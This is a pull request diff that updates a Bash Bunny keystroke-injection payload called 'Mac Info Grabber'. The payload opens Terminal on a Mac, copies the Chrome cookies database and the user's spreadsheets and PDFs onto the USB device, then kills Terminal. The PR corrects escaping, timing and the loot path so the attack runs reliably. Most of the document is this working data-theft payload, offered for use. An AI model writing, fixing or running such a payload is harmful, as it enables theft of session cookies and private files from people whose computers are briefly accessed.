### PR TITLE
Fixes macinfograbber payload

### DIFF
--- a/payloads/library/macinfograbber/payload.txt
+++ b/payloads/library/macinfograbber/payload.txt
@@ -15,36 +15,38 @@
 
 LED G R
 ATTACKMODE HID STORAGE
-LOOTDIR=/root/udisk/loot/MacLoot
-mkdir -p $LOOTDIR
+
+lootdir=loot/MacLoot
+mkdir -p /root/udisk/$lootdir
+
 QUACK GUI SPACE
 QUACK DELAY 1000
 QUACK STRING terminal
 QUACK ENTER
-QUACK DELAY 8000
-QUACK STRING mkdir -p /Volumes/BashBunny/$LOOTDIR/xlsx
+QUACK DELAY 5000
+QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/xlsx
 QUACK ENTER
 QUACK DELAY 500
-QUACK STRING cat ~/Library/Application Support/Google/Chrome/Default/Cookies > /Volumes/BashBunny/$LOOTDIR/chromecookies.db
+QUACK STRING cat \~/Library/Application\\ Support/Google/Chrome/Default/Cookies \>
+/Volumes/BashBunny/$lootdir/chromecookies.db
 QUACK ENTER
 QUACK DELAY 1000
-QUACK STRING cd ~/Documents && cp *.xlsx *.xls /Volumes/BashBunny/$LOOTDIR/xlsx/
+QUACK STRING cp \~/Documents/{*.xlsx,*.xls,*.pdf} /Volumes/BashBunny/$lootdir/xlsx/\; killall Terminal
 QUACK ENTER
-QUACK DELAY 1000
-QUACK GUI q
-QUACK DELAY 500
-QUACK ENTER
+
+# Sync filesystem
+sync
 
 # Green LED for finished
 LED G
 
-files=$(ls /Volumes/BashBunny/$LOOTDIR/xlsx/*.xls 2> /dev/null | wc -l)
-files2=$(ls /Volumes/BashBunny/$LOOTDIR/xlsx/*.xlsx 2> /dev/null | wc -l)
-if [ "$files" != "0" -o "$files2" != "0"]
-then
-# Got spreadsheet files
-LED R B
+files=$(ls /Volumes/BashBunny/$lootdir/xlsx/*.xls 2> /dev/null | wc -l)
+files2=$(ls /Volumes/BashBunny/$lootdir/xlsx/*.xlsx 2> /dev/null | wc -l)
+
+if [ "$files" != "0" -o "$files2" != "0"]; then
+  # Got spreadsheet files
+  LED R B
 else
-LED R
-# No spread sheets
+  LED R
+  # No spread sheets
 fi

--- a/payloads/library/macinfograbber/payload.txt
+++ b/payloads/library/macinfograbber/payload.txt
@@ -7,12 +7,13 @@
 # Steaks cookies from chrome and documents from the documents folder (spreadsheets)
 # then stashes them in /root/udisk/loot/MacLoot
 #
+# Amber..............Executing payload
 # Red................Failed to get spreadsheets
 # Purple.............Got some spreadsheets
 # Green..............Finished
 #
 
-LED R
+LED G R
 ATTACKMODE HID STORAGE
 LOOTDIR=/root/udisk/loot/MacLoot
 mkdir -p $LOOTDIR

--- a/payloads/library/macinfograbber/payload.txt
+++ b/payloads/library/macinfograbber/payload.txt
@@ -2,7 +2,7 @@
 #
 # Title:         Mac Info Grabber
 # Author:        kmakblob
-# Version:       1.1
+# Version:       1.2
 #
 # Steaks cookies from chrome and documents from the documents folder (spreadsheets)
 # then stashes them in /root/udisk/loot/MacLoot

--- a/payloads/library/macinfograbber/readme.md
+++ b/payloads/library/macinfograbber/readme.md
@@ -1,7 +1,7 @@
 # Mac Info Grabber for the BashBunny
 
 * Author: kmakblob
-* Version: Version 1.0
+* Version: Version 1.2
 * Target: OSX
 
 ## Description

--- a/payloads/library/macinfograbber/readme.md
+++ b/payloads/library/macinfograbber/readme.md
@@ -15,6 +15,7 @@ This payload can be easily modified to grab other files like word docs or csv fi
 
 | LED                | Status                                       |
 | ------------------ | -------------------------------------------- |
+| Amber              | Executin Payload                             |
 | Green              | Attack Finished                              |
 | Purple             | Successfully grabbed xls or xlsx files       |
-| RED                | Did not get any xls or xlsx files            |
+| Red                | Did not get any xls or xlsx files            |


### PR DESCRIPTION
 - fixes lootdir path
  - dont capitalize var names that aren't exported
  - indentation
  - escape shell characters that are passed to QUACK
  - account for variable copy times by joining cp and exit commands
  - sync the disk